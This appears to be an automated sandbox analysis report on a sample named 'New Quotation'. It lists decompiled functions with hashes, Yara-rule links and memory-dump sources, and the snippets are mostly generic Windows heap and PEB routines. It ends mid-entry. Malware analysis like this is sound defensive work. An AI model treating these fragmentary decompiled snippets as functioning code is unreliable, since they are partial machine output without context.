                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: fe704abc3b3f537b49b0ce406c68ed4b114733fd81b233abab36c3c526a765a6
                                                                                                                                                                                          • Instruction ID: dbb03171f1319a6bf15cb156fc4e9ba092b25207a4cdae576587a0e290831938
                                                                                                                                                                                          • Opcode Fuzzy Hash: fe704abc3b3f537b49b0ce406c68ed4b114733fd81b233abab36c3c526a765a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81D05E76111540DFD726CB04C946F7533A4FB00B45F0640B8A10A8B930C328F800DB40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D858F8B Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D858F8B() {

				if( *((char*)( *[fs:0x30] + 2)) != 0 ||  *0x7ffe02d4 != 0) {
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x00010000;
				}
				return 1;
			}



                                                                                                                                                                                          0x1d858f95
                                                                                                                                                                                          0x1d858fb5
                                                                                                                                                                                          0x1d858fb5
                                                                                                                                                                                          0x1d858fba

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                                                          • Instruction ID: 0e00245ec4e3c54170475a918332f748fa47a5cef2eb39142de5c58bdfc5a3df
                                                                                                                                                                                          • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CD01739921AC48FE317CB04D1A2B507BB5F749B90F850099F04247BA2C27C9D84CB41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FB839 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e760a4ad3564b3af300f3acb6abb57938ec9b0200c8c8c7ccef3f332a9657571
                                                                                                                                                                                          • Instruction ID: fdf2348f8f19637e6e1b750e623068a862a4c49bd22a80c3352ce294fd61cb3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: e760a4ad3564b3af300f3acb6abb57938ec9b0200c8c8c7ccef3f332a9657571
                                                                                                                                                                                          • Instruction Fuzzy Hash: AED022318082E5CFE7329F10C50877833B2FB80234F480C69C0A807661833A4C02C783
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CDC40 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7CDC40() {
				signed int* _t3;
				void* _t5;

				_t3 = E1D7E5D90(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                                                                                                          0x1d7cdc4d
                                                                                                                                                                                          0x1d7cdc54
                                                                                                                                                                                          0x1d7cdc5f
                                                                                                                                                                                          0x1d7cdc56
                                                                                                                                                                                          0x1d7cdc56
                                                                                                                                                                                          0x1d7cdc5c
                                                                                                                                                                                          0x1d7cdc5c

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                                                                                                                                          • Instruction ID: e83df85c7ea09ce7d6c910e90cb3d38b67cb37f02eb10c2a061d7434b58445e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CC08C30280B409EEB324B24CD01B2036A0BB40B40F8200A16300DA0F0EBB8E800EA00
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D853C57 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D853C57(intOrPtr _a4, intOrPtr _a8) {

				return E1D7E2710( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                                                                                                          0x1d853c73

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 03709d6d71206267f39e1a1d74387e03fee686b3819606185ebfbb9edac324f5
                                                                                                                                                                                          • Instruction ID: 055c28d74596784de19860e31bce847515a07704bd5d24e0ff95a6d1c340a880
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03709d6d71206267f39e1a1d74387e03fee686b3819606185ebfbb9edac324f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43C01236180248BBCB126E81DC40F057B2AEB94BA0F018010BA080A5708672E960EA84
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CB9B0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7CB9B0(signed int _a4) {

				E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
				return 0;
			}



                                                                                                                                                                                          0x1d7cb9c3
                                                                                                                                                                                          0x1d7cb9cb

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1ce48c692328559c5ea89c7542e9e85a8e831fd0de7584cb87acb83bc22fe3ef
                                                                                                                                                                                          • Instruction ID: 1a52293315d2ea3a3dde7be3159dcd404b477e3b89c59c8ce007c5368c37774b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce48c692328559c5ea89c7542e9e85a8e831fd0de7584cb87acb83bc22fe3ef
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FC08C32184248BBC7229A91DD01F027B69E790BA0F010021B60846570C532E820D588
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CD800 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7CD800() {

				if(E1D7E3C40() != 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1c));
				} else {
					return  *0x7ffe02f0 >> 0x00000008 & 0x00000001;
				}
			}



                                                                                                                                                                                          0x1d7cd807
                                                                                                                                                                                          0x1d82a794
                                                                                                                                                                                          0x1d7cd80d
                                                                                                                                                                                          0x1d7cd817
                                                                                                                                                                                          0x1d7cd817

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 66c774283d1a1110e7bd9d26a7d6ce41b4a3712fc5d1a4f2c61309b5c784cd3d
                                                                                                                                                                                          • Instruction ID: 482949b1d60e791ff603824fad81f699bfff55f5be5fd2ba47435905aea6f2ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 66c774283d1a1110e7bd9d26a7d6ce41b4a3712fc5d1a4f2c61309b5c784cd3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1C08C3D2605818FCA05CB28C190A8877F8FB40A91FC604D0E840CBB21D218E802EB00
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E5D60 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7E5D60(intOrPtr _a4) {
				void* _t5;

				return E1D7E5D90(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                                                                                                          0x1d7e5d79

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                                                                                                                          • Instruction ID: f827b7fa5dfb4c0473874517cb1715035c794ca854fc534e06bd195b46e0810c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BC08C3208028CBBC7129A45EC04F057B29E790BA0F010020B6040A5708572F860D588
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FB9FA Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7FB9FA(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                                                                                                          0x1d7fba00
                                                                                                                                                                                          0x1d7fba16
                                                                                                                                                                                          0x1d7fba02
                                                                                                                                                                                          0x1d7fba13
                                                                                                                                                                                          0x1d7fba13

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                                                                                                                          • Instruction ID: 699ec166e46c5405eb3218a59426b2dea1d515096faa12691e170b9eb7336a0c
                                                                                                                                                                                          • Opcode Fuzzy Hash: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43C02B312504C09ADB158B34CC44F303354F740A70FB003547330464F0D978BC00D900
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E3C40 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7E3C40() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                                                                                                          0x1d7e3c46
                                                                                                                                                                                          0x1d7e3c4b
                                                                                                                                                                                          0x1d7e3c50
                                                                                                                                                                                          0x1d7e3c4d
                                                                                                                                                                                          0x1d7e3c4d
                                                                                                                                                                                          0x1d7e3c4d

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                                                          • Instruction ID: a14b918062176476067686230203ce7c856566c12cb6d4ef8dc08f2f80dfee4d
                                                                                                                                                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EB092343019818FDE06CF29C490B0573E4BB84A80B8500D1E404C7A20D228E8009900
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A492D Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D8A492D() {

				return E1D7F2180( *((intOrPtr*)( *[fs:0x30] + 0xa0))) & 0xffffff00 | _t5 != 0x00000000;
			}



                                                                                                                                                                                          0x1d8a4943

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
                                                                                                                                                                                          • Instruction ID: 509dc40f139158cdc94455a9957027192c1d43773807d6dcc4fba0b696e2af5b
                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23B01231212545EFC7125724CB84B5832A9BF016D0F0E04B0A700C5470DE189810D503
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7DFCC9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                                                                                                                                          • Instruction ID: 8c6ec63d4e6389cc8a36ad7e573b1943fe89885dd2f9a8da53b6b7375ae22673
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1B01236810940CFCF83DF40D600A197333FB40730F1A4850910017530C238F802CB41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812D50 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1608ca32b6bf97a22a65fed6c01979bd15aa9e3e848189d7582b25750b63bfb1
                                                                                                                                                                                          • Instruction ID: 2879f45f1390398e56eb6a487bdd2554d4229b2793154b092c2d9b72524ec21c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1608ca32b6bf97a22a65fed6c01979bd15aa9e3e848189d7582b25750b63bfb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: E490022135100402D9026159451470A001987D1345FD2C416F1414515DC63D8997F133
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D813C90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c8728909dce986fba3568330882178dc3ff5a5f3bed3da9242ab6bf5c6157fa0
                                                                                                                                                                                          • Instruction ID: 8fa8f592a72305c6f7737a6d02fc8526794f6cb123067540651c7f8e87334733
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8728909dce986fba3568330882178dc3ff5a5f3bed3da9242ab6bf5c6157fa0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B90023525100402DD106159590474A005647D0301FD2D815F0414518DC66C88E5F123
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812CD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7e0012e26e9deb67bf4a960c380bb5e0c1cf66e4a0bb224083e332dc5ae71996
                                                                                                                                                                                          • Instruction ID: ff7a990a778862c71f411bfc8235f68aeb82f29626871442ed6cb1516b2619d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e0012e26e9deb67bf4a960c380bb5e0c1cf66e4a0bb224083e332dc5ae71996
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9490023129100402D9417159450470A001957D0241FD2C416F0414514EC66D8A9AFA63
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812C10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ecda15c6fefa16593df1fbeda8aa2cd862560f9e2c620d49679eb6ed2728a9b6
                                                                                                                                                                                          • Instruction ID: bffa6075794eb24e31f99cad542ad734fc9f9360822f7514d41182ae9e7e6dbb
                                                                                                                                                                                          • Opcode Fuzzy Hash: ecda15c6fefa16593df1fbeda8aa2cd862560f9e2c620d49679eb6ed2728a9b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E90023125100403D9006159560870B001547D0201FD2D815F0414518DD66E8895B123
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812C20 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8808a724f28701b5a8fdbafc85b376406c02a4752e7b873bcbbb1cd4194c5da2
                                                                                                                                                                                          • Instruction ID: a88d91a13384ba01166dab6207a282b9c09de1990fb08aade535e74a8d51251a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8808a724f28701b5a8fdbafc85b376406c02a4752e7b873bcbbb1cd4194c5da2
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC90022125504442D90065595508B0A001547D0205FD2D415F1054555DC63D8895F133
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D813C30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 64fd89f31b4db866ea7016d5108ffe1ddd7e17252f470f83893497f54b3192f8
                                                                                                                                                                                          • Instruction ID: 8deff2b2da9d52992c2371b3256c7f5790039b25940336fcaff26cc1e3f20a99
